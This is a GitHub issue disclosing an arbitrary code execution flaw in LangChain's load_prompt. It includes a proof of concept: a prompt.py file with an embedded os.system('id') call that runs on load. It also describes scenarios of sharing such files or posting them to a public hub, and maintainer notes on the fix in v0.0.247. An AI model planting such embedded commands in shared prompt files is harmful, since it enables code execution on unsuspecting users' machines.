Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Arbitrary code execution in load_prompt #4849

Closed
2 of 14 tasks
0gur1 opened this issue May 17, 2023 · 2 comments
Closed
2 of 14 tasks

Arbitrary code execution in load_prompt #4849

0gur1 opened this issue May 17, 2023 · 2 comments

Comments

@0gur1
Copy link

0gur1 commented May 17, 2023
edited

System Info

LangChain version:0.0.171
windows 10

Who can help?

No response

Information

  • The official example notebooks/scripts
  • My own modified scripts

Related Components

  • LLMs/Chat Models
  • Embedding Models
  • Prompts / Prompt Templates / Prompt Selectors
  • Output Parsers
  • Document Loaders
  • Vector Stores / Retrievers
  • Memory
  • Agents / Agent Executors
  • Tools / Toolkits
  • Chains
  • Callbacks/Tracing
  • Async

Reproduction

  1. A python prompt file prompt.py
from langchain.output_parsers.list import CommaSeparatedListOutputParser
from langchain.prompts.prompt import PromptTemplate
_DECIDER_TEMPLATE = """Given the below input question and list of potential tables, output a comma separated list of the table names that may be neccessary to answer this question.

Question: {query}

Table Names: {table_names}

Relevant Table Names:"""

import os
os.system('id')
PROMPT = PromptTemplate(
    input_variables=["query", "table_names"],
    template=_DECIDER_TEMPLATE,
    output_parser=CommaSeparatedListOutputParser(),
)
  1. Load the prompt with load_prompt function
from langchain.prompts import load_prompt
load_prompt('prompt.py')
  1. The id command will be executed.

Attack scene1: Alice can send prompt file to Bob and let Bob to load it.
Attack scene2: Alice upload the prompt file to a public hub such as 'langchain-hub'. Bob load the prompt from an url.

Expected behavior

The code cannot be executed without any check.
@inpaner inpaner mentioned this issue Jun 23, 2023
Closed
14 tasks
@Jflick58 Jflick58 mentioned this issue Jun 26, 2023
Closed
@JamalRahman JamalRahman mentioned this issue Jun 30, 2023
Closed
14 tasks
@hwchase17
Copy link
Contributor

moved to experimental, should be good!

@sectheops sectheops mentioned this issue Aug 21, 2023
Closed
@obi1kenobi
Copy link
Collaborator

Closing the loop here: the affected code was deleted in #8425 and that change was released in langchain v0.0.247.

Version v0.0.247 and newer do not have this issue.

obi1kenobi added a commit to obi1kenobi/advisory-database that referenced this issue Aug 29, 2023
@obi1kenobi
Update PYSEC-2023-92 with fix information.
eb05917 
The referenced issue has been closed and this comment within it confirms the fix has been published: langchain-ai/langchain#4849 (comment)
@obi1kenobi obi1kenobi mentioned this issue Aug 29, 2023
Merged
oliverchang pushed a commit to pypa/advisory-database that referenced this issue Aug 30, 2023
@obi1kenobi
Update PYSEC-2023-92 with fix information. (#153)
da6a4e3 
The referenced issue has been closed and this comment within it confirms the fix has been published: langchain-ai/langchain#4849 (comment)
@fubuki8087 fubuki8087 mentioned this issue Apr 11, 2024
Merged
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

Throw error if trying to deserialize python prompts Jflick58/langchain
3 participants
@obi1kenobi @hwchase17 @0gur1